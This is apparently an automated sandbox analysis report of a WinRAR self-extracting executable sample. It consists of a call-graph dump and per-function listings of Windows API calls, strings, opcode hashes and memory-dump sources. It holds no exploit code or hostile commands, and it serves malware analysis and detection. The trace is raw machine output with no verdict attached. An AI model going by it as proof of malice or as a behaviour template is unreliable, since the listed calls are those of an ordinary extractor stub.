24723->24725 24724 a4777d 24726 a40d7c _ValidateLocalCookies 5 API calls 24724->24726 24725->24671 24728 a47789 24726->24728 24728->24671 24729->24721 24768 a47650 5 API calls _ValidateLocalCookies 24729->24768 24731 a2b122 24730->24731 24732 a2b135 24730->24732 24736 a2b140 24731->24736 24769 a27800 77 API calls 24731->24769 24734 a2b148 SetFilePointer 24732->24734 24732->24736 24735 a2b164 GetLastError 24734->24735 24734->24736 24735->24736 24737 a2b16e 24735->24737 24736->24680 24737->24736 24770 a27800 77 API calls 24737->24770 24740 a2a825 24739->24740 24741 a2a836 24739->24741 24740->24741 24742 a2a831 24740->24742 24743 a2a838 24740->24743 24741->24703 24771 a2a9ae 24742->24771 24776 a2a880 24743->24776 24747 a2ae73 24746->24747 24748 a2ae6c 24746->24748 24747->24748 24750 a2a9e5 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24747->24750 24791 a277bd 77 API calls 24747->24791 24748->24680 24750->24747 24751->24680 24752->24677 24753->24700 24754->24700 24755->24700 24756->24700 24757->24700 24758->24700 24759->24685 24760->24690 24761->24688 24763 a2cf3f _wcslen 24762->24763 24764 a2cfe7 GetCurrentDirectoryW 24763->24764 24765 a2cf68 _wcslen 24763->24765 24764->24765 24765->24710 24766->24720 24767->24724 24768->24729 24769->24732 24770->24736 24772 a2a9e1 24771->24772 24775 a2a9b7 24771->24775 24772->24741 24775->24772 24782 a2b470 24775->24782 24777 a2a8aa 24776->24777 24778 a2a88c 24776->24778 24779 a2a8c9 24777->24779 24790 a27685 76 API calls 24777->24790 24778->24777 24780 a2a898 FindCloseChangeNotification 24778->24780 24779->24741 24780->24777 24783 a3ffd0 24782->24783 24784 a2b47d DeleteFileW 24783->24784 24785 a2b490 24784->24785 24786 a2a9df 24784->24786 24787 a2cf32 GetCurrentDirectoryW 24785->24787 24786->24741 24788 a2b4a4 24787->24788 24788->24786 24789 a2b4a8 DeleteFileW 24788->24789 24789->24786 24790->24779 24791->24747 24794 a33345 _wcslen 24792->24794 24793 a33378 CompareStringW 24793->24597 24794->24793 24795->24599 24797 a490a3 _abort 24796->24797 24798 a490bc 24797->24798 24799 a490aa 24797->24799 24820 a4bdf1 EnterCriticalSection 24798->24820 24832 a491f1 GetModuleHandleW 24799->24832 24802 a490af 24802->24798 24833 a49235 GetModuleHandleExW 24802->24833 24807 a490c3 24815 a49138 24807->24815 24818 a49161 24807->24818 24841 a49bb0 20 API calls _abort 24807->24841 24808 a4917e 24824 a491b0 24808->24824 24809 a491aa 24842 a53550 5 API calls _ValidateLocalCookies 24809->24842 24812 a49e61 _abort 5 API calls 24817 a49150 24812->24817 24813 a49e61 _abort 5 API calls 24813->24818 24815->24812 24815->24817 24817->24813 24821 a491a1 24818->24821 24820->24807 24843 a4be41 LeaveCriticalSection 24821->24843 24823 a4917a 24823->24808 24823->24809 24844 a4c236 24824->24844 24827 a491de 24830 a49235 _abort 8 API calls 24827->24830 24828 a491be GetPEB 24828->24827 24829 a491ce GetCurrentProcess TerminateProcess 24828->24829 24829->24827 24831 a491e6 ExitProcess 24830->24831 24832->24802 24834 a49282 24833->24834 24835 a4925f GetProcAddress 24833->24835 24836 a49291 24834->24836 24837 a49288 FreeLibrary 24834->24837 24838 a49274 24835->24838 24839 a40d7c _ValidateLocalCookies 5 API calls 24836->24839 24837->24836 24838->24834 24840 a490bb 24839->24840 24840->24798 24841->24815 24843->24823 24845 a4c25b 24844->24845 24849 a4c251 24844->24849 24846 a4be58 __dosmaperr 5 API calls 24845->24846 24846->24849 24847 a40d7c _ValidateLocalCookies 5 API calls 24848 a491ba 24847->24848 24848->24827 24848->24828 24849->24847 26135 a3fe61 48 API calls _unexpected 26085 a3c460 99 API calls 26136 a4b660 71 API calls _free 26137 a51a60 IsProcessorFeaturePresent 26115 a22570 96 API calls 26088 a21075 44 API calls 26118 a3a540 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 26159 a40747 29 API calls _abort 26119 a40540 46 API calls __RTC_Initialize 26091 a2a850 80 API calls Concurrency::cancel_current_task 26120 a26950 41 API calls __EH_prolog 26092 a3b450 GdipCloneImage GdipAlloc 26160 a3e750 70 API calls 26121 a41550 51 API calls 2 library calls 26138 a4c65d 6 API calls _ValidateLocalCookies 26057 a3fd58 26058 a3fd62 26057->26058 26059 a3f9e9 ___delayLoadHelper2@8 14 API calls 26058->26059 26060 a3fd6f 26059->26060

                                                                                              Executed Functions

                                                                                              Function 00A3F05C Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 202filesleeptimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00A31B83: GetModuleHandleW.KERNEL32(kernel32), ref: 00A31B9C
                                                                                                • Part of subcall function 00A31B83: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A31BAE
                                                                                                • Part of subcall function 00A31B83: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A31BDF
                                                                                                • Part of subcall function 00A3B65D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00A3B665
                                                                                                • Part of subcall function 00A3BD1B: OleInitialize.OLE32(00000000), ref: 00A3BD34
                                                                                                • Part of subcall function 00A3BD1B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A3BD6B
                                                                                                • Part of subcall function 00A3BD1B: SHGetMalloc.SHELL32(00A6A460), ref: 00A3BD75
                                                                                              • GetCommandLineW.KERNEL32 ref: 00A3F09B
                                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00A3F0C5
                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00A3F0D6
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00A3F127
                                                                                                • Part of subcall function 00A3ED2E: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00A3ED44
                                                                                                • Part of subcall function 00A3ED2E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A3ED80
                                                                                                • Part of subcall function 00A30752: _wcslen.LIBCMT ref: 00A30776
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A3F12E
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00A80CC0,00000800), ref: 00A3F148
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00A80CC0), ref: 00A3F154
                                                                                              • GetLocalTime.KERNEL32(?), ref: 00A3F15F
                                                                                              • _swprintf.LIBCMT ref: 00A3F19E
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00A3F1B3
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00A3F1BA
                                                                                              • LoadIconW.USER32(00000000,00000064), ref: 00A3F1D1
                                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9D0,00000000), ref: 00A3F222
                                                                                              • Sleep.KERNELBASE(?), ref: 00A3F250
                                                                                              • DeleteObject.GDI32 ref: 00A3F289
                                                                                              • DeleteObject.GDI32(?), ref: 00A3F299
                                                                                              • CloseHandle.KERNEL32 ref: 00A3F2DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 3014515783-3710569615
                                                                                              • Opcode ID: 45dfe769e33463fb96ddda4d296b7487c0d315f76ad29b5cb4a143a3cfe82cdf
                                                                                              • Instruction ID: ba07476001436e8ba34199eda968126dcb27f130015ae7943712db94c2c0ff99
                                                                                              • Opcode Fuzzy Hash: 45dfe769e33463fb96ddda4d296b7487c0d315f76ad29b5cb4a143a3cfe82cdf
                                                                                              • Instruction Fuzzy Hash: 9D61F4B1900300BFD320EBE5ED49F6B7BECFB59345F000529FA45921A1DB749986CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3B6D2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 739 a3b6d2-a3b6ef FindResourceW 740 a3b6f5-a3b706 SizeofResource 739->740 741 a3b7eb 739->741 740->741 743 a3b70c-a3b71b LoadResource 740->743 742 a3b7ed-a3b7f1 741->742 743->741 744 a3b721-a3b72c LockResource 743->744 744->741 745 a3b732-a3b747 GlobalAlloc 744->745 746 a3b7e3-a3b7e9 745->746 747 a3b74d-a3b756 GlobalLock 745->747 746->742 748 a3b7dc-a3b7dd GlobalFree 747->748 749 a3b75c-a3b77a call a42dc0 747->749 748->746 753 a3b7d5-a3b7d6 GlobalUnlock 749->753 754 a3b77c-a3b79e call a3b636 749->754 753->748 754->753 759 a3b7a0-a3b7a8 754->759 760 a3b7c3-a3b7d1 759->760 761 a3b7aa-a3b7be GdipCreateHBITMAPFromBitmap 759->761 760->753 761->760 762 a3b7c0 761->762 762->760
                                                                                              APIs
                                                                                              • FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00A3C92D,00000066), ref: 00A3B6E5
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,00A3C92D,00000066), ref: 00A3B6FC
                                                                                              • LoadResource.KERNEL32(00000000,?,?,?,00A3C92D,00000066), ref: 00A3B713
                                                                                              • LockResource.KERNEL32(00000000,?,?,?,00A3C92D,00000066), ref: 00A3B722
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00A3C92D,00000066), ref: 00A3B73D
                                                                                              • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00A3C92D,00000066), ref: 00A3B74E
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00A3B7D6
                                                                                                • Part of subcall function 00A3B636: GdipAlloc.GDIPLUS(00000010), ref: 00A3B63C
                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A3B7B7
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00A3B7DD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                              • String ID: PNG
                                                                                              • API String ID: 541704414-364855578
                                                                                              • Opcode ID: 302a52f3920fb186a79dfbb4e3e2fb639a3b31d24d2cf7638b948eee759b0654
                                                                                              • Instruction ID: 0c82b23c69e07b488aabfec10a638635d6e7c8c3b907d9c291575cd3bcadd81b
                                                                                              • Opcode Fuzzy Hash: 302a52f3920fb186a79dfbb4e3e2fb639a3b31d24d2cf7638b948eee759b0654
                                                                                              • Instruction Fuzzy Hash: D1318171615702AFD710DFA1EC88D1B7FA9FF89756F010628FA05C2260EB31D886CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2BA94 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1068 a2ba94-a2bab8 call a3ffd0 1071 a2bb20-a2bb29 FindNextFileW 1068->1071 1072 a2baba-a2bac7 FindFirstFileW 1068->1072 1073 a2bb3b-a2bbf8 call a3192f call a2d71d call a32924 * 3 1071->1073 1074 a2bb2b-a2bb39 GetLastError 1071->1074 1072->1073 1075 a2bac9-a2badb call a2cf32 1072->1075 1080 a2bbfd-a2bc0a 1073->1080 1076 a2bb12-a2bb1b 1074->1076 1082 a2baf7-a2bb00 GetLastError 1075->1082 1083 a2badd-a2baf5 FindFirstFileW 1075->1083 1076->1080 1085 a2bb02-a2bb05 1082->1085 1086 a2bb10 1082->1086 1083->1073 1083->1082 1085->1086 1088 a2bb07-a2bb0a 1085->1088 1086->1076 1088->1086 1091 a2bb0c-a2bb0e 1088->1091 1091->1076
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00A2B98B,000000FF,?,?), ref: 00A2BABD
                                                                                                • Part of subcall function 00A2CF32: _wcslen.LIBCMT ref: 00A2CF56
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00A2B98B,000000FF,?,?), ref: 00A2BAEB
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00A2B98B,000000FF,?,?), ref: 00A2BAF7
                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00A2B98B,000000FF,?,?), ref: 00A2BB21
                                                                                              • GetLastError.KERNEL32(?,?,?,?,00A2B98B,000000FF,?,?), ref: 00A2BB2D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 42610566-0
                                                                                              • Opcode ID: 7e48d5cf27a22cd25121426cfceb29e46a60f1748e1aa4785f59bcec225cf25c
                                                                                              • Instruction ID: a533a11a4919d875a86ba891661f6322bcab19a2f227c268e697e0836bcfc59f
                                                                                              • Opcode Fuzzy Hash: 7e48d5cf27a22cd25121426cfceb29e46a60f1748e1aa4785f59bcec225cf25c
                                                                                              • Instruction Fuzzy Hash: EC419472910629ABCB25DF68DC84BE9B3B8FB48350F1001A6F55DE3250D7346E94CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3BEFF Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1095 a3beff-a3bf16 call a3c324 1098 a3bfaf-a3bfb0 1095->1098 1099 a3bf1c-a3bf5e SetEntriesInAclW 1095->1099 1100 a3bf60-a3bf6d InitializeSecurityDescriptor 1099->1100 1101 a3bfad-a3bfae 1099->1101 1102 a3bf9f-a3bfa2 1100->1102 1103 a3bf6f-a3bf80 SetSecurityDescriptorDacl 1100->1103 1101->1098 1102->1101 1105 a3bfa4-a3bfa7 LocalFree 1102->1105 1103->1102 1104 a3bf82-a3bf99 CreateDirectoryW 1103->1104 1104->1102 1105->1101
                                                                                              APIs
                                                                                                • Part of subcall function 00A3C324: GetCurrentProcess.KERNEL32(00020008,00A3BF14,?,?,?,?,00A3BF14,?), ref: 00A3C333
                                                                                                • Part of subcall function 00A3C324: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00A3BF14,?), ref: 00A3C33A
                                                                                                • Part of subcall function 00A3C324: GetTokenInformation.KERNELBASE(00A3BF14,00000001(TokenIntegrityLevel),00000000,00000000,?,?,?,?,?,00A3BF14,?), ref: 00A3C354
                                                                                                • Part of subcall function 00A3C324: GetLastError.KERNEL32(?,?,?,?,00A3BF14,?), ref: 00A3C35E
                                                                                                • Part of subcall function 00A3C324: GetTokenInformation.KERNELBASE(00A3BF14,00000001(TokenIntegrityLevel),00000000,?,?,?,?,?,?,?,00A3BF14,?), ref: 00A3C382
                                                                                                • Part of subcall function 00A3C324: CopySid.ADVAPI32(00000044,00A3BF14,00000000,?,?,?,?,?,00A3BF14,?), ref: 00A3C393
                                                                                              • SetEntriesInAclW.ADVAPI32(00000001,11060000,00000000,?,?,?,?), ref: 00A3BF56
                                                                                              • InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?), ref: 00A3BF65
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,?,?), ref: 00A3BF78
                                                                                              • CreateDirectoryW.KERNELBASE(?,0000000C,?,?,?), ref: 00A3BF99
                                                                                              • LocalFree.KERNEL32(?,?,?,?), ref: 00A3BFA7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Token$DescriptorInformationProcessSecurity$CopyCreateCurrentDaclDirectoryEntriesErrorFreeInitializeLastLocalOpen
                                                                                              • String ID:
                                                                                              • API String ID: 2740647886-0
                                                                                              • Opcode ID: 760d0847321fe3c936668d12d6f1364c168a5415e96078972bf7f05f7f454cf9
                                                                                              • Instruction ID: b4f07fb34c88b91cbb3b9e65c95bd28d01cec8439ea65273e67d4d6cd22915c0
                                                                                              • Opcode Fuzzy Hash: 760d0847321fe3c936668d12d6f1364c168a5415e96078972bf7f05f7f454cf9
                                                                                              • Instruction Fuzzy Hash: 8F21B2B5C00218AEDB10CFA5DD48ADEBBBCFF44750F10805AE905E2210DB349A46DFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A292C6 Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1157COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A292CB
                                                                                                • Part of subcall function 00A2D656: _wcsrchr.LIBVCRUNTIME ref: 00A2D660
                                                                                                • Part of subcall function 00A2CAA0: _wcslen.LIBCMT ref: 00A2CAA6
                                                                                                • Part of subcall function 00A31907: _wcslen.LIBCMT ref: 00A3190D
                                                                                                • Part of subcall function 00A2B5D6: _wcslen.LIBCMT ref: 00A2B5E2
                                                                                                • Part of subcall function 00A2B5D6: __aulldiv.LIBCMT ref: 00A2B60E
                                                                                                • Part of subcall function 00A2B5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 00A2B615
                                                                                                • Part of subcall function 00A2B5D6: _swprintf.LIBCMT ref: 00A2B640
                                                                                                • Part of subcall function 00A2B5D6: _wcslen.LIBCMT ref: 00A2B64A
                                                                                                • Part of subcall function 00A2B5D6: _swprintf.LIBCMT ref: 00A2B6A0
                                                                                                • Part of subcall function 00A2B5D6: _wcslen.LIBCMT ref: 00A2B6AA
                                                                                                • Part of subcall function 00A24727: __EH_prolog.LIBCMT ref: 00A2472C
                                                                                                • Part of subcall function 00A2A212: __EH_prolog.LIBCMT ref: 00A2A217
                                                                                                • Part of subcall function 00A2B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A2B5B5,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B8FA
                                                                                                • Part of subcall function 00A2B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A2B5B5,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B92B
                                                                                              Strings
                                                                                              • __tmp_reference_source_, xrefs: 00A29596
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
                                                                                              • String ID: __tmp_reference_source_
                                                                                              • API String ID: 70197177-685763994
                                                                                              • Opcode ID: 60db7b3f69115b24d41faf4eefd3f6794fdf0e800fe99c0665cf462d4d190887
                                                                                              • Instruction ID: d5bc24df24b0a96c2a8e7a4d1f24a0baf0226ff7c1ec0919c4f3e43ec7e46648
                                                                                              • Opcode Fuzzy Hash: 60db7b3f69115b24d41faf4eefd3f6794fdf0e800fe99c0665cf462d4d190887
                                                                                              • Instruction Fuzzy Hash: 15A24B31904265AFDF19DF78D995BEFBBB4BF15700F0801B9E8499B182D7309A88CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A491B0 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00A49186,00000000,00A5D570,0000000C,00A492DD,00000000,00000002,00000000), ref: 00A491D1
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00A49186,00000000,00A5D570,0000000C,00A492DD,00000000,00000002,00000000), ref: 00A491D8
                                                                                              • ExitProcess.KERNEL32 ref: 00A491EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: cbb7919400b6fec749de017867d40e010c430625fcb31261da12564e032b2f39
                                                                                              • Instruction ID: caf65b6f30c4a0db6d6c8f69b2e29276708e133ec20549ab01fc13692aa72769
                                                                                              • Opcode Fuzzy Hash: cbb7919400b6fec749de017867d40e010c430625fcb31261da12564e032b2f39
                                                                                              • Instruction Fuzzy Hash: 32E04F39000208ABCF11AFA4CD0CA8A3F6AFB84356F000114F90D47131CB75ED93CA40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3C9D0 Relevance: 102.2, APIs: 49, Strings: 9, Instructions: 734windowfilesleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A3C9D5
                                                                                                • Part of subcall function 00A212F6: GetDlgItem.USER32(00000000,00003021), ref: 00A2133A
                                                                                                • Part of subcall function 00A212F6: SetWindowTextW.USER32(00000000,00A545F4), ref: 00A21350
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A3CAC1
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A3CADF
                                                                                              • IsDialogMessageW.USER32(?,?), ref: 00A3CAF2
                                                                                              • TranslateMessage.USER32(?), ref: 00A3CB00
                                                                                              • DispatchMessageW.USER32(?), ref: 00A3CB0A
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00A3CB2D
                                                                                              • EndDialog.USER32(?,00000001), ref: 00A3CB50
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00A3CB73
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A3CB8E
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00A545F4), ref: 00A3CBA1
                                                                                                • Part of subcall function 00A3E598: _wcslen.LIBCMT ref: 00A3E5C2
                                                                                              • SetFocus.USER32(00000000), ref: 00A3CBA8
                                                                                              • _swprintf.LIBCMT ref: 00A3CC07
                                                                                                • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00A3CC6A
                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00A3CC92
                                                                                              • GetTickCount.KERNEL32 ref: 00A3CCB0
                                                                                              • _swprintf.LIBCMT ref: 00A3CCC8
                                                                                              • GetLastError.KERNEL32(?,00000011), ref: 00A3CCFA
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00A3CD4D
                                                                                              • _swprintf.LIBCMT ref: 00A3CD84
                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 00A3CDD8
                                                                                              • GetCommandLineW.KERNEL32 ref: 00A3CDEE
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00A71482,00000400,00000001,00000001), ref: 00A3CE45
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00A3CE6D
                                                                                              • WaitForInputIdle.USER32(?,00002710), ref: 00A3CEA1
                                                                                              • Sleep.KERNEL32(00000064), ref: 00A3CEB5
                                                                                              • UnmapViewOfFile.KERNEL32(?,?,0000421C,00A71482,00000400), ref: 00A3CEDE
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A3CEE7
                                                                                              • _swprintf.LIBCMT ref: 00A3CF1A
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A3CF79
                                                                                              • SetDlgItemTextW.USER32(?,00000065,00A545F4), ref: 00A3CF90
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00A3CF99
